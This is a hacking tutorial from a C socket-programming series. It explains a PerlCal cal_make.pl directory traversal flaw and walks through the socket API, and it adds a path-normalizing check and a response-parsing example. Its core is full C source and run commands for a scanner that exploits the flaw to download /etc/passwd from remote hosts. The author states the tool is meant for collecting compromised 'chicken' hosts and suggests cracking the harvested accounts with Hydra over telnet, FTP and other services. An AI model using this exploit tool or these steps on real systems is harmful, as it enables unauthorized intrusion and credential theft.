Linux C Programming (5): a cal_make.pl vulnerability scanner

I. Idea:
This tool uses a "show file" class vulnerability (a CGI script that echoes back an arbitrary file) to fetch the password file of a remote host. Usage is basically the same as the previous tool in this series; you could call it a sister program. Vulnerability description:
Vulnerability name: PerlCal directory traversal vulnerability
Overview: the cal_make.pl script does not sanitize its p0 parameter, so a remote attacker can use "../" sequences to read files outside the web root directory.
Affected versions: Acme Software PerlCal 2.95, 2.9e, 2.9d, 2.9c, 2.9b, 2.9a, 2.9, 2.80, 2.7, 2.6, 2.5, 2.4, 2.3, 2.18, 2.13
Description:
PerlCal is a CGI script developed by ACME Software that provides web-based calendar features. The script has a flaw that lets a remote attacker use ".." sequences to read files outside the web root directory; what can be read is limited only by the permissions of the web server process, which normally runs as the nobody user.
Test method: submit the following URL request:
http://www.example.com/cgi-bin/cal_make.pl?p0=../../../../../../../../../../etc/passwd
The server will return the contents of /etc/passwd.
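To make the vulnerability class concrete, here is an added example (it is not part of the original article and not PerlCal's code) of the check the script was missing: a lexical normalizer that resolves "." and ".." components and rejects any request path that would climb above the document root. The document root value, the function names and the sample request paths are assumptions for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Normalize a relative request path lexically (no filesystem access):
 * drop empty and "." components, resolve "..", and report whether the
 * path ever tries to climb above the root. Returns 1 if it stays inside
 * (normalized form written to out), 0 if it escapes or does not fit. */
int normalize_under_root(const char *req, char *out, size_t outlen)
{
    const char *segs[64];           /* kept components (hypothetical limit) */
    size_t seglens[64];
    int depth = 0;
    const char *p = req;

    while (*p) {
        while (*p == '/') p++;      /* skip "/" and empty components */
        if (!*p) break;
        const char *start = p;
        while (*p && *p != '/') p++;
        size_t len = (size_t)(p - start);

        if (len == 1 && start[0] == '.')
            continue;               /* "." is a no-op */
        if (len == 2 && start[0] == '.' && start[1] == '.') {
            if (depth == 0)
                return 0;           /* ".." above the root: traversal */
            depth--;
            continue;
        }
        if (depth == 64) return 0;  /* too deep for this example */
        segs[depth] = start;
        seglens[depth] = len;
        depth++;
    }

    size_t used = 0;
    for (int i = 0; i < depth; i++) {
        if (used + seglens[i] + 2 > outlen) return 0;  /* room for '/' and NUL */
        if (i > 0) out[used++] = '/';
        memcpy(out + used, segs[i], seglens[i]);
        used += seglens[i];
    }
    out[used] = '\0';
    return 1;
}

/* Build "doc_root/normalized" only when the request is safe.
 * Returns 1 and fills fs_path on success, 0 when the request must be rejected. */
int resolve_request(const char *doc_root, const char *req, char *fs_path, size_t n)
{
    char rel[512];
    if (!normalize_under_root(req, rel, sizeof(rel)))
        return 0;
    int w = snprintf(fs_path, n, "%s/%s", doc_root, rel);
    return w > 0 && (size_t)w < n;
}

int main(void)
{
    /* Constructed inputs: the traversal payload from the advisory and benign paths. */
    const char *root = "/var/www/perlcal";             /* assumed document root */
    const char *tests[] = {
        "cal/2004/march.dat",
        "../../../../../../etc/passwd",
        "cal/../cal/./2004/march.dat",
        "cal/../../etc/passwd",
    };
    char fs[1024];
    for (size_t i = 0; i < sizeof(tests) / sizeof(tests[0]); i++) {
        if (resolve_request(root, tests[i], fs, sizeof(fs)))
            printf("ALLOW %-32s -> %s\n", tests[i], fs);
        else
            printf("DENY  %-32s (escapes document root)\n", tests[i]);
    }
    return 0;
}
```

Two caveats for anyone adapting this: the check must run on the URL-decoded parameter (a "%2e%2e" that is decoded after the check bypasses it), and a purely lexical check does not see symbolic links inside the document root; for that the final path must also be resolved with realpath() and compared against the root.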
II. Function description: a bit more socket programming knowledge, so bear with it!
1. Socket types: SOCK_STREAM, SOCK_DGRAM, SOCK_RAW, SOCK_SEQPACKET, SOCK_RDM
2. Address structures: sockaddr_in, sockaddr, in_addr
3. The flow of a TCP socket exchange:

Server                                 Client
socket()
   |
bind()
   |
listen()                               socket()
   |                                      |
accept()   <---- connection -------- connect()
   |                                      |
recv()     <---- data request -------- send()
   |                                      |
send()     ----- data response ------> recv()
   |                                      |
recv()     <---- end of connection --- close()
   |
close()
The following introduces several important functions in more detail:

1. socket()
1.1 Prototype:
#include <sys/types.h>
#include <sys/socket.h>
int socket(int domain, int type, int protocol);
1.2 Parameters: domain is the protocol family, AF_INET for IPv4. type is the communication type: SOCK_STREAM (stream socket), SOCK_DGRAM (datagram socket) or SOCK_RAW (raw socket). protocol is the protocol to use; 0 lets the system pick the default for that type.
1.3 Return value: a non-negative socket descriptor on success, -1 on failure.

2. connect()
2.1 Prototype:
#include <sys/types.h>
#include <sys/socket.h>
int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
2.2 Return value: 0 on success, -1 on failure.

3. send()
3.1 Prototype:
#include <sys/types.h>
#include <sys/socket.h>
ssize_t send(int sockfd, const void *buf, size_t len, int flags);
3.2 Return value: the number of bytes sent, or -1 on failure. Pass the real length of the data (strlen() for a string), not the size of the array it sits in.

4. recv()
4.1 Prototype:
#include <sys/types.h>
#include <sys/socket.h>
ssize_t recv(int sockfd, void *buf, size_t len, int flags);
4.2 Return value: the number of bytes received, 0 when the peer has closed the connection, -1 on failure. recv() does not NUL-terminate buf, so always use the returned length.

5. gethostbyname()
5.1 Prototype:
#include <netdb.h>
struct hostent *gethostbyname(const char *name);
5.2 Description: resolves a host name (domain name) or dotted-decimal address string into a hostent structure (see 7 below) holding the host's IP address(es). Returns NULL if resolution fails.

6. sockaddr_in structure
6.1 Structure: sockaddr_in is defined in netinet/in.h:
struct sockaddr_in {
    short int          sin_family;   /* address family */
    unsigned short int sin_port;     /* port number */
    struct in_addr     sin_addr;     /* network address */
    unsigned char      sin_zero[8];  /* padding to the size of struct sockaddr */
};
6.2 Description: use a sockaddr_in structure to set or obtain address information.
sin_family: the address family; for this program it is always AF_INET.
sin_port: the port number, stored in network byte order.
sin_addr: the IP address, a struct in_addr { unsigned long s_addr; } (in_addr_t, a 32-bit value, on modern systems). This wrapper structure is kept for historical reasons; s_addr holds the IP address in network byte order.
sin_zero: padding so that sockaddr_in is the same size as struct sockaddr; keep it zeroed.
6.3 Example:
struct sockaddr_in sa;
sa.sin_family = AF_INET;
sa.sin_port = htons(3490);                  /* short, network byte order */
sa.sin_addr.s_addr = inet_addr("132.241.5.10");
bzero(&(sa.sin_zero), 8);
Note: setting sa.sin_addr.s_addr = INADDR_ANY means "any local IP address", which is what a server uses when binding.

7. hostent structure
7.1 Structure: this data structure is defined as follows:
struct hostent {
    char  *h_name;        /* official name of the host */
    char **h_aliases;     /* host aliases */
    int    h_addrtype;    /* address type, normally AF_INET */
    int    h_length;      /* address length in bytes */
    char **h_addr_list;   /* host network addresses, NULL-terminated list */
};
The macro h_addr stands for h_addr_list[0], the first address in the list; that is what gets copied into sin_addr, using h_length bytes.
III. Programming:
Under Linux, create the file (nightcat@nightcat$ vi calmake.c) and enter the following:

/* The calmake scanner version 1.0
 *
 * One simple way to collect Linux zombie hosts ("chickens") is to search
 * for vulnerable CGI scripts such as way-board.cgi and use my small tool
 * to get the passwd file.
 *
 * To compile:
 *   user$ gcc -o calmake calmake.c
 *
 * To use:
 *   user$ ./calmake somedomain.com directory   (e.g. ./calmake antion.com directory)
 *
 * Coded by nightcat
 * March 2004
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

int main(int argc, char *argv[])
{
    int s;
    struct sockaddr_in victim;
    struct hostent *bad;
    char buffer[1024];
    FILE *fp;
    char cgihole[300];
    ssize_t n;

    if (argc != 3) {
        exit(printf("\nUsage: %s domain.com directory\n", argv[0]));   /*** Note 1 ***/
    }
    /* HTTP/1.0 request for the path given on the command line; CRLF line ends */
    snprintf(cgihole, sizeof(cgihole), "GET %s HTTP/1.0\r\n\r\n", argv[2]);
    printf("%s", cgihole);

    if ((bad = gethostbyname(argv[1])) == NULL) {
        exit(printf("Error getting hostname\n"));
    }
    printf("Check the hole\n");
    printf("Coded by nightcat\n");
    sleep(2);

    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s < 0) exit(printf("Socket error\n"));

    /* first resolved address, h_length bytes, into the sockaddr_in */
    bcopy(bad->h_addr, (char *)&victim.sin_addr, bad->h_length);
    victim.sin_family = AF_INET;
    victim.sin_port = htons(80);
    if (connect(s, (struct sockaddr *)&victim, sizeof(victim)) < 0) {
        exit(printf("Connect error\n"));
    }
    printf("\nGetting host's passwd.txt\n\n");
    if ((fp = fopen("getpasswd.txt", "w")) == NULL) {
        exit(printf("Can't open file\n"));
    }
    /* send only the request text, not the whole 300-byte array */
    send(s, cgihole, strlen(cgihole), 0);
    /* keep reading until the server closes the connection (recv returns 0) */
    while ((n = recv(s, buffer, sizeof(buffer), 0)) > 0) {   /*** Note 2 ***/
        fwrite(buffer, 1, (size_t)n, fp);   /* write exactly the bytes received */
    }
    fclose(fp);
    close(s);
    return 0;
}
Save and exit (:wq), then compile and run:
$ gcc -o calmake calmake.c
$ ./calmake targetip '/cgi-bin/cal_make.pl?p0=../../../../../../../../etc/passwd'
Quote the second argument so the shell does not treat the "?" as a glob character. This fetches the same user file as the manual request in section I and saves it to getpasswd.txt.
You can then go after the host's ordinary user accounts with a password cracker. I like to use Hydra: $ ./hydra -f /root/passwd.txt targetip telnet. See its documentation for the details! It can crack other services as well: FTP, VNC, SMTP and so on. Keep in mind that on a system using shadow passwords, /etc/passwd only gives you the list of user names; the password hashes live in /etc/shadow, so what you really get is a user list to guess passwords against a login service.
IV. Notes:
Note 1: this is the format of the input. In fact the program can be used with other show-file vulnerabilities as well.
Note 2: the while loop is needed to receive all of the returned data; I spent a long time here before I understood it! It means: as long as recv() returns more than zero bytes, keep writing them to the file; the loop ends when the server closes the connection (recv() returns 0) or an error occurs (recv() returns -1).
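Note 2 deserves a worked example. Added here (this is not the original tool's code): a recv() loop that reassembles the whole reply however the server chunks it, plus a check on the result, fed offline through a socketpair with a constructed response. The sample replies, the function names and the "looks like passwd" heuristic are my assumptions for illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>

/* Read until the peer closes (an HTTP/1.0 server does so after one reply)
 * or an error occurs. recv() may return the reply in arbitrary chunks, so
 * loop until it returns 0. Returns a malloc'd NUL-terminated buffer
 * (length in *len) or NULL on error. */
char *recv_all(int fd, size_t *len)
{
    size_t cap = 4096, used = 0;
    char *buf = malloc(cap);
    if (!buf) return NULL;
    for (;;) {
        if (used + 1 >= cap) {                     /* grow, keep room for NUL */
            char *nb = realloc(buf, cap * 2);
            if (!nb) { free(buf); return NULL; }
            buf = nb;
            cap *= 2;
        }
        ssize_t n = recv(fd, buf + used, cap - used - 1, 0);
        if (n == 0) break;                         /* peer closed: reply complete */
        if (n < 0) { free(buf); return NULL; }     /* error */
        used += (size_t)n;
    }
    buf[used] = '\0';
    *len = used;
    return buf;
}

/* Status code from the status line, or -1 if this is not an HTTP response. */
int http_status(const char *resp)
{
    int code;
    return sscanf(resp, "HTTP/%*d.%*d %3d", &code) == 1 ? code : -1;
}

/* Pointer to the body after the blank line, or NULL if the headers never end. */
const char *http_body(const char *resp)
{
    const char *p = strstr(resp, "\r\n\r\n");
    if (p) return p + 4;
    p = strstr(resp, "\n\n");                      /* tolerate bare-LF servers */
    return p ? p + 2 : NULL;
}

/* Heuristic: a passwd file has a line starting "root:" with six ':' separators. */
int looks_like_passwd(const char *body)
{
    for (const char *line = body; line && *line; ) {
        const char *nl = strchr(line, '\n');
        size_t linelen = nl ? (size_t)(nl - line) : strlen(line);
        if (linelen > 5 && strncmp(line, "root:", 5) == 0) {
            int colons = 0;
            for (size_t i = 0; i < linelen; i++) colons += (line[i] == ':');
            if (colons == 6) return 1;
        }
        line = nl ? nl + 1 : NULL;
    }
    return 0;
}

/* 1 = hole confirmed (200 and passwd-like body), 0 = not confirmed, -1 = malformed.
 * The body check matters: a patched script may still answer 200 with an error page. */
int check_response(const char *resp)
{
    int code = http_status(resp);
    const char *body = http_body(resp);
    if (code < 0 || !body) return -1;
    return (code == 200 && looks_like_passwd(body)) ? 1 : 0;
}

/* Offline demo: push a canned reply through a socketpair in two writes, so the
 * same recv loop must reassemble partial reads as it would over a real socket. */
int demo(const char *canned)
{
    int sv[2];
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) < 0) return -1;
    size_t total = strlen(canned), half = total / 2;
    if (write(sv[0], canned, half) < 0 || write(sv[0], canned + half, total - half) < 0)
        return -1;
    close(sv[0]);                                  /* the "server" hangs up */
    size_t len;
    char *resp = recv_all(sv[1], &len);
    close(sv[1]);
    if (!resp) return -1;
    int verdict = check_response(resp);
    free(resp);
    return verdict;
}

/* Constructed sample replies (assumptions, not captured from any real host). */
static const char VULN_RESP[] =
    "HTTP/1.0 200 OK\r\nContent-Type: text/plain\r\n\r\n"
    "root:x:0:0:root:/root:/bin/bash\nnobody:x:99:99:Nobody:/:/sbin/nologin\n";
static const char SAFE_RESP[] =
    "HTTP/1.0 404 Not Found\r\nContent-Type: text/html\r\n\r\n<html>no such file</html>\n";

int main(void)
{
    printf("vulnerable sample -> %d\n", demo(VULN_RESP));   /* 1 */
    printf("patched sample    -> %d\n", demo(SAFE_RESP));   /* 0 */
    return 0;
}
```

In a real scan you would call recv_all() on the connected socket from the program above instead of the socketpair end; everything after that point is identical, which is the point of keeping the reading and the checking in separate functions.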
V. Contact me:
Nickname: nightcat
E-mail: ncnynl@hotmail.com
QQ: 1043931
ICQ: 153436005